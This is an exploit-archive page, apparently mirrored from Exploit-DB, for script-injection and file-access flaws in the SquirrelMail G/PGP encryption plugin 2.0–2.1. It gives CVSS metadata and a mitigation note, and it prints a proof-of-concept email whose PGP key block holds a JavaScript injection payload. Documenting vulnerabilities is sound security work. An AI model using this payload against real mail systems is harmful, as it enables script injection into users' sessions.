Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Input and Access Validation Vulnerabilities in SquirrelMail G/PGP Encryption Plugin - exploit.company
header-logo
Suggest Exploit
vendor:
G/PGP Encryption Plugin
by:
Unknown
7.5
CVSS
HIGH
Input and Access Validation
20
CWE
Product Name: G/PGP Encryption Plugin
Affected Version From: 2
Affected Version To: 2.1
Patch Exists: NO
Related CWE:
CPE: a:squirrelmail_project:gpg_encryption_plugin:2.0 cpe:/a:squirrelmail_project:gpg_encryption_plugin:2.0.1 cpe:/a:squirrelmail_project:gpg_encryption_plugin:2.1
Metasploit:
Other Scripts:
Platforms Tested:
2007

Input and Access Validation Vulnerabilities in SquirrelMail G/PGP Encryption Plugin

The G/PGP encryption plugin for SquirrelMail is prone to an input-validation vulnerability and an access-validation vulnerability. Attackers can exploit these issues to inject arbitrary script code into public key data or to delete and overwrite arbitrary files with the privileges of the application.

Mitigation:

Update to a non-vulnerable version of the plugin. Additionally, input and access validation should be implemented in the plugin to prevent these vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26788/info

The G/PGP encryption plugin for SquirrelMail is prone to an input-validation vulnerability and an access-validation vulnerability.

Attackers can exploit these issues to inject arbitrary script code into public key data or to delete and overwrite arbitrary files with the privileges of the application.

SquirrelMail G/PGP Encryption Plugin 2.0, 2.0.1, and 2.1 are vulnerable; other versions may also be affected.

NOTE: One or more of these issues may already have been documented in the following BIDs, but we don't have enough information at this time to distinguish among them:

- 24782, SquirrelMail G/PGP Encryption Plug-in Unspecified Remote Command Execution Vulnerability
- 24828, SquirrelMail G/PGP Encryption Plug-in Multiple Unspecified Remote Command Execution Vulnerabilities
- 24874, SquirrelMail G/PGP Encryption Plug-in Multiple Remote Command Execution
Vulnerabilities

Message-ID: <50453.10.0.0.1.1192345884.squirrel@mail.example.org>
Date: Sun, 14 Oct 2007 10:11:24 +0300 (EEST)
Subject: Test mail with SquirrelMail GPG 2.1 POC exploit
From: test@example.org

Test mail with SquirrelMail GPG 2.1 JavaScript exploit

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.6 (GNU/Linux)

"><script language="JavaScript">
<!--
alert("unsanitized javascript")
-->
</script>
<input type="hidden" name="hideout" value="
-----END PGP PUBLIC KEY BLOCK-----

Navigation

Suggest Exploit

Services By CQR